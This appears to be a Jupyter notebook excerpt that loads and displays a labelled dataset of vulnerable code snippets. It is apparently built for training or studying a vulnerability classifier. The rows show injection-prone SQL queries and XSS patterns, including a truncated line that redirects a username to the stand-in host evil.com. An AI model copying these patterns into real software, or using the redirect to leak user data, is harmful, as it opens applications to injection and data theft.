In [1]:
import pandas as pd

In [3]:
code_vul = pd.read_csv("../Datasets/code_vulnerabilities.csv")

In [5]:
code_vul

,Code Snippet,Vulnerability Type,Location,Preprocessed Tokens
0,cursor.execute('SELECT * FROM users WHERE user...,SQLi,8,"[""cursor.execute('SELECT"", '*', 'FROM', 'users..."
1,alert('Hello ' + user_input);,XSS,19,"[""alert('Hello"", ""'"", '+', 'user_input);']"
2,document.location = 'http://evil.com?username=...,XSS,2,"['document.location', '=', ""'http://evil.com?u..."
3,query = 'SELECT * FROM customers WHERE email =...,SQLi,14,"['query', '=', ""'SELECT"", '*', 'FROM', 'custom..."
4,db.execute('SELECT * FROM employees WHERE id =...,SQLi,17,"[""db.execute('SELECT"", '*', 'FROM', 'employees..."
...,...,...,...,...
995,db.execute('SELECT * FROM products WHERE produ...,SQLi,12,"[""db.execute('SELECT"", '*', 'FROM', 'products'..."
996,connection.query('SELECT * FROM users WHERE us...,SQLi,9,"[""connection.query('SELECT"", '*', 'FROM', 'use..."
997,alert('Hello ' + user_input);,XSS,16,"[""alert('Hello"", ""'"", '+', 'user_input);']"
998,query = 'SELECT * FROM customers WHERE email =...,SQLi,17,"['query', '=', ""'SELECT"", '*', 'FROM', 'custom..."
999,query = 'SELECT * FROM customers WHERE email =...,SQLi,12,"['query', '=', ""'SELECT"", '*', 'FROM', 'custom..."